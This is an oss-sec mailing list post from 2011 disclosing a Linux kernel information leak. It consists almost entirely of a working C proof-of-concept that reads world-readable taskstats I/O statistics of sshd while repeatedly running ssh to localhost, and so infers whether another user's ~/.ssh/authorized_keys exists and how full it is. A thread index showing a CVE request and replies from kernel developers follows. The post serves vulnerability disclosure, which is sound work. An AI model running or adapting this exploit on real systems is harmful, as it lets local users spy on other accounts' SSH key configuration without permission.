oss-sec mailing list archives
taskstats authorized_keys presence infoleak PoC
From: Vasiliy Kulikov <segoon () openwall com>
Date: Tue, 21 Jun 2011 22:18:08 +0400
/* * This program tries to learn whether ~user/.ssh/authorized_keys exists * and is nonempty for any user on local machine. It uses world-readable * taskstats' nature to get somewhat private io statistics information. If * implant taskstats or /proc/<sshd-pid>/io polling into ssh client, it would be * possible to learn precise authorized_keys' size (and estimate private * key's(s') size). * * The specific min_rsyscalls bounds are working on the testing machine with * Linux-3.0-rc2 x86_64 and OpenSSH_5.3p1 Debian-3ubuntu6 with * UsePrivilegeSeparation=no. Other systems need their own numbers. * * gcc ssh_stat_authorized_keys.c -o ssh_stat_authorized_keys * * Based on linux-2.6/Documentation/accounting/getdelays.c * * by Vasiliy Kulikov <segoon from openwall on com>, 2011/06/21 */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <unistd.h> #include <poll.h> #include <string.h> #include <fcntl.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <sys/wait.h> #include <signal.h> #include <linux/genetlink.h> #include <linux/taskstats.h> #include <linux/cgroupstats.h> /* * Generic macros for dealing with netlink sockets. Might be duplicated * elsewhere. It is recommended that commercial grade applications use * libnl or libnetlink and use the interfaces provided by the library */ #define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN)) #define GENLMSG_PAYLOAD(glh) (NLMSG_PAYLOAD(glh, 0) - GENL_HDRLEN) #define NLA_DATA(na) ((void *)((char*)(na) + NLA_HDRLEN)) #define NLA_PAYLOAD(len) (len - NLA_HDRLEN) #define err(code, fmt, arg...) \ do { \ fprintf(stderr, fmt, ##arg); \ exit(code); \ } while (0) char name[100]; /* Maximum size of response requested or message sent */ #define MAX_MSG_SIZE 1024 /* Maximum number of cpus expected to be specified in a cpumask */ #define MAX_CPUS 32 struct msgtemplate { struct nlmsghdr n; struct genlmsghdr g; char buf[MAX_MSG_SIZE]; }; char cpumask[100+6*MAX_CPUS] = "0,1"; static void usage(void) { fprintf(stderr, "getdelays [-dilv] [-w logfile] [-r bufsize] " "[-m cpumask] [-t tgid] [-p pid]\n"); fprintf(stderr, " -d: print delayacct stats\n"); fprintf(stderr, " -i: print IO accounting (works only with -p)\n"); fprintf(stderr, " -l: listen forever\n"); fprintf(stderr, " -v: debug on\n"); fprintf(stderr, " -C: container path\n"); } /* * Create a raw netlink socket and bind */ static int create_nl_socket(int protocol) { int fd; struct sockaddr_nl local; fd = socket(AF_NETLINK, SOCK_RAW, protocol); if (fd < 0) return -1; memset(&local, 0, sizeof(local)); local.nl_family = AF_NETLINK; if (bind(fd, (struct sockaddr *) &local, sizeof(local)) < 0) goto error; return fd; error: close(fd); return -1; } static int send_cmd(int sd, __u16 nlmsg_type, __u32 nlmsg_pid, __u8 genl_cmd, __u16 nla_type, void *nla_data, int nla_len) { struct nlattr *na; struct sockaddr_nl nladdr; int r, buflen; char *buf; struct msgtemplate msg; msg.n.nlmsg_len = NLMSG_LENGTH(GENL_HDRLEN); msg.n.nlmsg_type = nlmsg_type; msg.n.nlmsg_flags = NLM_F_REQUEST; msg.n.nlmsg_seq = 0; msg.n.nlmsg_pid = nlmsg_pid; msg.g.cmd = genl_cmd; msg.g.version = 0x1; na = (struct nlattr *) GENLMSG_DATA(&msg); na->nla_type = nla_type; na->nla_len = nla_len + 1 + NLA_HDRLEN; memcpy(NLA_DATA(na), nla_data, nla_len); msg.n.nlmsg_len += NLMSG_ALIGN(na->nla_len); buf = (char *) &msg; buflen = msg.n.nlmsg_len ; memset(&nladdr, 0, sizeof(nladdr)); nladdr.nl_family = AF_NETLINK; while ((r = sendto(sd, buf, buflen, 0, (struct sockaddr *) &nladdr, sizeof(nladdr))) < buflen) { if (r > 0) { buf += r; buflen -= r; } else if (errno != EAGAIN) return -1; } return 0; } /* * Probe the controller in genetlink to find the family id * for the TASKSTATS family */ static int get_family_id(int sd) { struct { struct nlmsghdr n; struct genlmsghdr g; char buf[256]; } ans; int id = 0, rc; struct nlattr *na; int rep_len; strcpy(name, TASKSTATS_GENL_NAME); rc = send_cmd(sd, GENL_ID_CTRL, getpid(), CTRL_CMD_GETFAMILY, CTRL_ATTR_FAMILY_NAME, (void *)name, strlen(TASKSTATS_GENL_NAME)+1); if (rc < 0) return 0; /* sendto() failure? */ rep_len = recv(sd, &ans, sizeof(ans), 0); if (ans.n.nlmsg_type == NLMSG_ERROR || (rep_len < 0) || !NLMSG_OK((&ans.n), rep_len)) return 0; na = (struct nlattr *) GENLMSG_DATA(&ans); na = (struct nlattr *) ((char *) na + NLA_ALIGN(na->nla_len)); if (na->nla_type == CTRL_ATTR_FAMILY_ID) { id = *(__u16 *) NLA_DATA(na); } return id; } int main(int argc, char *argv[]) { int c, rc, rep_len, aggr_len, len2; __u16 id; __u32 mypid; struct nlattr *na; int nl_sd = -1; int len = 0; pid_t cpid; char username[128] = "root"; unsigned long long min_rsyscalls = 100000, max_rsyscalls = 0; int count = 0; int maskset = 1; int max_count = 10; struct msgtemplate msg; struct taskstats *tst; while (1) { c = getopt(argc, argv, "u:"); if (c < 0) break; switch (c) { case 'u': strcpy(username, optarg); break; default: usage(); exit(-1); } } if ((nl_sd = create_nl_socket(NETLINK_GENERIC)) < 0) err(1, "error creating Netlink socket\n"); mypid = getpid(); id = get_family_id(nl_sd); if (!id) { fprintf(stderr, "Error getting family id, errno %d\n", errno); goto err; } rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET, TASKSTATS_CMD_ATTR_REGISTER_CPUMASK, &cpumask, strlen(cpumask) + 1); if (rc < 0) { fprintf(stderr, "error sending register cpumask\n"); goto err; } if ((cpid = fork()) == 0) { char buffer[128]; struct timeval tv; snprintf(buffer, sizeof(buffer), "ssh %s@localhost -o PasswordAuthentication=no >/dev/null 2>/dev/null; echo -n .", username); printf("[*] username: %s\n[*] wait", username); fflush(stdout); while (1) { system(buffer); if (kill(mypid, 0)) exit(0); tv.tv_sec = 0; tv.tv_usec = 100000; select(0, NULL, NULL, NULL, &tv); } } do { rep_len = recv(nl_sd, &msg, sizeof(msg), 0); if (rep_len < 0) { fprintf(stderr, "nonfatal reply error: errno %d\n", errno); continue; } if (msg.n.nlmsg_type == NLMSG_ERROR || !NLMSG_OK((&msg.n), rep_len)) { struct nlmsgerr *err = NLMSG_DATA(&msg); fprintf(stderr, "fatal reply error, errno %d\n", err->error); goto done; } rep_len = GENLMSG_PAYLOAD(&msg.n); na = (struct nlattr *) GENLMSG_DATA(&msg); len = 0; while (len < rep_len) { len += NLA_ALIGN(na->nla_len); switch (na->nla_type) { case TASKSTATS_TYPE_AGGR_TGID: /* Fall through */ case TASKSTATS_TYPE_AGGR_PID: aggr_len = NLA_PAYLOAD(na->nla_len); len2 = 0; /* For nested attributes, na follows */ na = (struct nlattr *) NLA_DATA(na); while (len2 < aggr_len) { switch (na->nla_type) { case TASKSTATS_TYPE_STATS: tst = (struct taskstats *) NLA_DATA(na); if (strcmp(tst->ac_comm, "sshd")) break; if (count++ >= max_count) goto done; //printf("rsyscalls: %lu\n", (unsigned long)tst->read_syscalls); if (max_rsyscalls < tst->read_syscalls) max_rsyscalls = tst->read_syscalls; if (min_rsyscalls > tst->read_syscalls) min_rsyscalls = tst->read_syscalls; break; default: //fprintf(stderr, "Unknown nested" " nla_type %d\n", na->nla_type); break; } len2 += NLA_ALIGN(na->nla_len); na = (struct nlattr *) ((char *) na + len2); } break; default: //fprintf(stderr, "Unknown nla_type %d\n", na->nla_type); case TASKSTATS_TYPE_NULL: break; } na = (struct nlattr *) (GENLMSG_DATA(&msg) + len); } } while (1); done: kill(cpid, SIGKILL); sleep(1); printf("\n[!] min/max read(): %llu/%llu\n[+] ", min_rsyscalls, max_rsyscalls); /* * These numbers are system-dependent! * Profile your system (e.g. on your own account) if you want it to work. */ if (min_rsyscalls < 197) printf("~/%s/.ssh/authorized_keys doesn't exists.\n", username); else if (min_rsyscalls < 203) printf("~/%s/.ssh/authorized_keys is empty.\n", username); else if (min_rsyscalls < 210) printf("~/%s/.ssh/authorized_keys is not empty.\n", username); else printf("~/%s/.ssh/authorized_keys is full of keys!\n", username); if (maskset) { rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET, TASKSTATS_CMD_ATTR_DEREGISTER_CPUMASK, &cpumask, strlen(cpumask) + 1); //printf("Sent deregister mask, retval %d\n", rc); if (rc < 0) err(rc, "error sending deregister cpumask\n"); } err: close(nl_sd); return 0; }
Current thread:
- taskstats authorized_keys presence infoleak PoC Vasiliy Kulikov (Jun 21)
- Re: taskstats authorized_keys presence infoleak PoC Josh Bressers (Jun 21)
- Re: taskstats authorized_keys presence infoleak PoC Vasiliy Kulikov (Jun 21)
- CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Vasiliy Kulikov (Jun 24)
- Re: CVE request: kernel: taskstats/procfs io infoleak Vasiliy Kulikov (Jun 25)
- Re: CVE request: kernel: taskstats/procfs io infoleak Eugene Teo (Jun 26)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Linus Torvalds (Jun 26)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Andrew Morton (Jun 28)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Linus Torvalds (Jun 28)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Linus Torvalds (Jun 28)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Vasiliy Kulikov (Jun 29)
- Re: taskstats authorized_keys presence infoleak PoC Josh Bressers (Jun 21)